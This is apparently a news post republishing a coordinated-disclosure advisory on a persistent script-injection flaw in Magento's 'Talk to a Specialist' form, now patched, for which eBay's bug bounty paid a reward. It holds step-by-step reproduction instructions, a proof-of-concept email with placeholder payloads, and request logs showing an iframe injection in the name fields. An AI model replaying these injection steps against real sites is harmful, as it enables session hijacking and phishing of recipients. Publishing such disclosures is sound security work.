Ebay Inc Magento 2015Q1 - Official Bug Bounty Program rewards Security Researcher

Editorial_Staff_Team's picture

Application-Side Vulnerability in Magento Disclosed By Researcher

The famous and trusted "Ebay Inc Bug Bounty Program" rewards a researchers that discloses an issue in the official magento service. To report a magento service vulnerability it is required to use the Ebay Inc Bug Bounty Program tool.

The german researcher (Benjamin Kunz Mejri) discovered an application-side input validation issue with connected mail encoding web vulnerability to ebay in 2014 Q1. Two days ago the "Ebay Inc Bug Bounty Program" notified the Vulnerability Labs core team researcher about the successful implemented patch. The company paid a reward of 500€ due to the valid vulnerability report. The issue is highlighted with details as one of the rare Tier 2 Application issues.

2014-03-14: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2014-03-15: Vendor Notification (eBay Inc Security Team - Bug Bounty Program)
2014-03-10: Vendor Response/Feedback (eBay Inc Security Team - Bug Bounty Program)
2015-02-12: Vendor Fix/Patch (Magento Developer Team)
2015-02-13: Bug Bounty Reward (eBay Inc Security Team - Bug Bounty Program)
2015-02-14: Public Disclosure (Vulnerability Laboratory)

The vulnerability is located in the first- and lastname values of the `Talk to a Specialist` module. Remote attackers without privileged application user account are able to inject persistent malicious script codes. The script code execution occurs in the notification mail to the specialist but also to the active user copy mail. The persistent injected script code executes in the header section were the database context of the first- and lastname will be displayed. The sender interacts automatically by usage of the magento.com & info.magento.com service. The validation of the db stored outgoing values is wrong encoded and allows persistent injections of malicious script codes via POST method. The attack vector is persistent and the injection request method is POST. 

The security risk of the mail encoding web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. Exploitation of the web vulnerability requires no privileged web-application user account and low or medium user interaction because of the persistent attack vector. Successful exploitation of the encoding vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation of web header or mail body context.

Vulnerable Domain(s):
[+] magento.com & info.magento.com

Vulnerable Module(s):
[+] Talk to a Specialist

Vulnerable Parameter(s):
[+] firstname
[+] lastname
[+] companyname

Affected Sender(s):
[+]  info@magento.com

Affected Receiver(s):
[+] bkm@evolution-sec.com

Affected Context Module(s):
[+] Section 1  > mktEditable

Proof of Concept (PoC):
The application-side input validation web vulnerability can be exploited by remote attackers without privileged user account and with low or medium user interaction. For security demonstration or to reproduce the mail encoding web vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce of the vulnerability ...
1. You do not need to register an account ;)
2. Open up the main website and switch to the magento.com contacts site
3. On the bottom you need to click the `talk to specialist` button
4. You get redirect to a regular valid formular with a mod specialist notification
5. Inject your script code payloads as first-, last- and companyname values
6. Click the send request button ...
Note: Now, you will be redirected by the service after choosing a specialist ... we used `E.C. Kraus` (#sry ;)
7. Send the same request from the input below to the specialist with a non malicious test payload
8. The persistent code execution occurs in the mail to the manager aka specialist but also to the sender of the notification itself (without user auth!)
9. Successful reproduce of the persistent script code injection web vulnerability via POST method request

PoC: Your E.C. Kraus Magento Enterprise Case Study Download

<html><head>
<title>Your E.C. Kraus Magento Enterprise Case Study Download</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table class="header-part1" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr><td><b>Betreff: </b>Your E.C. Kraus Magento Enterprise Case Study Download</td></tr><tr><td>
<b>Von: </b>Magento <info@magento.com></td></tr><tr><td><b>Datum: </b>15.03.2014 20:27</td></tr></tbody></table>
<table class="header-part2" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><b>An: </b>bkm@evolution-sec.com</td></tr></tbody></table><br>
<meta http-equiv="Content-Type" content="text/html; ">
<title></title>

<div id="Section 1" class="mktEditable"><p>Dear a "><[PERSISTENT INJECTED SCRIPT CODE 1!]">%20<[PERSISTENT INJECTED SCRIPT CODE 2!]>,</p>
<p>Thank you for requesting the Magento Enterprise Case Study on E.C. Kraus.  You can download the Case Study here:</p>
<p><a href=
"http://email.magento.com/397EXO8770000EP01aGC801"
>Download</a></p>
<p>Check out our complete list of <a href=
"http://email.magento.com/397EXO8770000EQ01aGC801"
>Magento Case Studies</a></p>
<p>To learn more about Magento Enterprise or to reqeust a personalized quote, please <a href=
"http://email.magento.com/397EXO8770000ER01aGC801"
>contact out Magento Enterprise team</a>.</p>
<p>Thank you,</p>
<p>The Magento Team</p></div>
<IMG SRC="http://email.magento.com/trk?t=1&mid=Mzk3LUVYTy04Nzc6MDozMzkyOjExMzI1OjA... WIDTH="1" HEIGHT="1" BORDER="0" ALT="" />
</body>
</html>
</body>
</html>
</iframe></p></div></body></html>

--- PoC Session Logs [POST] ---
Status: 200[OK]
GET http://magento.com/explore/contact-sales

Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[magento.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
     
Referer[http://magento.com/customers/customer-showcase]
      Cookie[optimizelySegments=%7B%22239237138%22%3A%22direct%22%2C%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%7D; optimizelyEndUserId=oeu1394911379094r0.20693940633527685; optimizelyBuckets=%7B%7D; _ga=GA1.2.394130418.1394911379; has_js=1; ClrSSID=1394911380598-4406; ClrOSSID=1394911380598-4406; ClrSCD=1394911380598; s_cc=true; s_fid=5EF56BF224B1A40C-0256902EC3CD13C6; gpv_pn=%2Fcustomers%2Fcustomer-showcase; undefined_s=First%20Visit; s_vnum=1396303200710%26vn%3D1; s_invisit=true; s_sq=magentomagento%2Cmagentoglobal%3D%2526pid%253D%25252Fcustomers%25252Fcustomer-showcase%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmagento.com%25252Fexplore%25252Fcontact-sales_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=-%2C84%2C84%2C2200; utm_src=a%3A6%3A%7Bs%3A8%3A%22campaign%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22medium%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22source%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A7%3A%22keyword%22%3Bs%3A0%3A%22%22%3Bs%3A3%3A%22url%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A4%3A%22time%22%3Bi%3A1394911525%3B%7D; _mkto_trk=id:397-EXO-877&token:_mch-magento.com-1394911532816-55587; _tsm=m%3DDirect%2520%252F%2520Brand%2520Aware%253A%2520Typed%2520%252F%2520Bookmarked%2520%252F%2520etc%7Cs%3Dmagento.com%7Crp%3D%252Fwww.magentocommerce.com%252Fdownload%7Crd%3Dmagento.com]
      Connection[keep-alive]
      If-None-Match["1394841413-1"]
   Response Header:
      Server[maged]
      Date[Sat, 15 Mar 2014 20:15:18 GMT]
      Content-Type[text/html; charset=utf-8]
      Transfer-Encoding[chunked]
      Connection[keep-alive]
      X-Drupal-Cache[HIT]
      Etag["1394841413-1"]
      x-content-type-options[nosniff]
      X-Frame-Options[SameOrigin]
      Content-Language[en]

      Link[<http://magento.com/explore/contact-sales>; rel="canonical",<http://magento.com/node/22>; rel="shortlink"]
      Cache-Control[public, max-age=86400]
      Last-Modified[Fri, 14 Mar 2014 23:56:53 +0000]
      Expires[Sun, 19 Nov 1978 05:00:00 GMT]
      Vary[Cookie, Accept-Encoding]
      Content-Encoding[gzip]
      X-Server[web04]

-
Status: 302[Found]
POST https://info.magento.com/index.php/leadCapture/save

Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[135] Mime Type[text/html]
   Request Header:

      Host[info.magento.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://info.magento.com/EC-Kraus.html]
      Cookie[optimizelySegments=%7B%22239237138%22%3A%22direct%22%2C%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%7D; optimizelyEndUserId=oeu1394911379094r0.20693940633527685; optimizelyBuckets=%7B%7D; _ga=GA1.2.394130418.1394911379; BIGipServerabjweb-ssl2_http=3892838666.20480.0000; s_cc=true; s_fid=5EF56BF224B1A40C-0256902EC3CD13C6; gpv_pn=%2Fec-kraus.html; undefined_s=First%20Visit; s_vnum=1396303200710%26vn%3D1; s_invisit=true; s_sq=magentoinfo%2Cmagentoglobal%3D%2526pid%253D%25252Fec-kraus.html%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BformSubmit%252528document.getElementById%252528%252522mktForm_1129%252522%252529%252529%25253Breturnfalse%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT; s_ppv=-%2C100%2C100%2C832; utm_src=a%3A6%3A%7Bs%3A8%3A%22campaign%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22medium%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22source%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A7%3A%22keyword%22%3Bs%3A0%3A%22%22%3Bs%3A3%3A%22url%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A4%3A%22time%22%3Bi%3A1394911525%3B%7D; BIGipServerabjweb-ssl2_https=3909615882.47873.0000; ClrSSID=1394911532386-9188; ClrOSSID=1394911532386-9188; ClrSCD=1394911532386; _mkto_trk=id:397-EXO-877&token:_mch-magento.com-1394911532816-55587; _tsm=m%3DDirect%2520%252F%2520Brand%2520Aware%253A%2520Typed%2520%252F%2520Bookmarked%2520%252F%2520etc%7Cs%3Dmagento.com%7Crp%3D%252Fwww.magentocommerce.com%252Fdownload%7Crd%3Dmagento.com; optimizelyPendingLogEvents=%5B%5D; ClrCSTO=T]
      Connection[keep-alive]
   POST-Daten:

      FirstName[%3Ciframe+src%3Da%3E]
      LastName[%3Ciframe+src%3Da%3E]

      Email[bkm%40evolution-sec.com]
      _marketo_comments[]
      lpId[2314]
      subId[36]
      munchkinId[397-EXO-877]
      kw[not+found]
      cr[not+found]
      searchstr[not+found]
      lpurl[https%3A%2F%2Finfo.magento.com%2FEC-Kraus.html%3Fcr%3D%7Bcreative%7D%26kw%3D%7Bkeyword%7D]
      formid[1129]

      returnURL[https%3A%2F%2Finfo.magento.com%2FEC-Kraus-confirm.html]
      retURL[https%3A%2F%2Finfo.magento.com%2FEC-Kraus-confirm.html]

      returnLPId[2301]
      _mkt_disp[return]
      _mkt_trk[id%3A397-EXO-877%26token%3A_mch-magento.com-1394911532816-55587]
      _comments_marketo[]
      _mkto_version[2.4.7]
   Response Header:
      Date[Sat, 15 Mar 2014 20:15:34 GMT]
      Server[Apache]
      Location[
https://info.magento.com/EC-Kraus-confirm.html?aliId=67114725]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Content-Length[135]
      Connection[close]
      Content-Type[text/html]

Reference(s):
http://magento.com/customers/customer-showcase
http://magento.com/explore/contact-sales
https://info.magento.com/EC-Kraus-confirm.html?aliId=67114607
https://info.magento.com/EC-Kraus.html
https://info.magento.com/index.php/leadCapture/save

The vulnerability has been patched by a secure parse or encode of the `talk to a specialist` input context. The service encodes and parses the outgoing user values in the talk to a specialist form to prevent persistent injections via POST. A Restriction has been set to the input that disallows the usage of special chars.

Advisory: http://www.vulnerability-lab.com/get_content.php?id=1226

 

Rate this article: 
Average: 5 (3 votes)

Add new comment

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.